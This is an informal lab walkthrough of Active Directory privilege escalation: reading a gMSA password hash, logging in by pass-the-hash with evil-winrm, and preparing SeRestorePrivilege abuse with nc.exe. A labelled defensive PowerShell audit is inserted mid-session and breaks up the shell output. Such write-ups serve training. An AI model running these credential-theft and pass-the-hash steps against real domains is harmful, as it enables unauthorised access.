This is some big brain shit. I had to look at a walkthrough because I would've never figured this out.
So basically, upon graphing the data using the pre-compiled binary from BloodHound,
you notice that the password of the gMSA svc_apache can be read by another principal:
"SVC_APACHE$@HEIST.OFFSEC is a Group Managed Service Account. The group WEB ADMINS@HEIST.OFFSEC can retrieve the password for the GMSA SVC_APACHE$@HEIST.OFFSEC."
So Web Admins can retrieve that gMSA password.
We see from the output of "Get-ADGroupMember 'Web Admins'" that the user enox is also part of Web Admins. That's us!
So that means that we, as a member of that group, can read the gMSA password too.
Using GMSAPasswordReader.exe --accountname 'svc_apache'
we are able to read the RC4 hash, which is just a hash that we can use to log in as that account (pass-the-hash, no cleartext password needed).
evil-winrm -i 192.168.105.165 -u svc_apache$ -H 45EA837EDB477DDA17B5822AD768D0D7
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_apache$\Documents>
Basically the gMSA password can be read by remote users: the svc_apache account's password is retrievable by Web Admins, and enox is in Web Admins, so we had the same rights and read its password using GMSAPasswordReader.exe --accountname 'svc_apache'.
We then used the evil-winrm line above to get a shell as svc_apache and checked its privileges:
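As an added example from the defensive side (not part of this writeup), this PowerShell audit lists every principal allowed to retrieve each gMSA's password and expands groups down to their users, so a chain like enox -> Web Admins -> svc_apache$ stands out during a review. It assumes the ActiveDirectory RSAT module on a domain-joined host with read access to the directory.

```powershell
# Added example, not from the writeup: report who can retrieve each gMSA password.
# Assumes the ActiveDirectory module (RSAT) and read access to the domain.
Import-Module ActiveDirectory

function Get-GmsaReaderReport {
    # PrincipalsAllowedToRetrieveManagedPassword holds the DNs that may read the password
    Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword |
    ForEach-Object {
        $gmsa = $_
        foreach ($dn in $gmsa.PrincipalsAllowedToRetrieveManagedPassword) {
            $principal = Get-ADObject -Identity $dn -Properties sAMAccountName
            if ($principal.ObjectClass -eq 'group') {
                # Recursive expansion shows every user who inherits the right via the group
                Get-ADGroupMember -Identity $dn -Recursive |
                    Where-Object { $_.objectClass -eq 'user' } |
                    ForEach-Object {
                        [PSCustomObject]@{
                            GMSA    = $gmsa.SamAccountName
                            Allowed = $principal.sAMAccountName
                            Via     = 'group'
                            User    = $_.SamAccountName
                        }
                    }
            } else {
                # Principal granted directly (a user or computer account)
                [PSCustomObject]@{
                    GMSA    = $gmsa.SamAccountName
                    Allowed = $principal.sAMAccountName
                    Via     = 'direct'
                    User    = $principal.sAMAccountName
                }
            }
        }
    }
}

# Review the output for users that should not be able to retrieve the password
Get-GmsaReaderReport | Sort-Object GMSA, User | Format-Table -AutoSize
```

Any user in the report who is not the intended host or service owner is a candidate for removal from the group or from the gMSA's allowed-principals list.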
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
As the svc_apache user we have SeRestorePrivilege. We can exploit this.
First we clone the GitHub repo into Visual Studio Code on our Windows client.
Afterwards, I transferred the SeRestoreAbuse.exe binary to the machine along with nc.exe.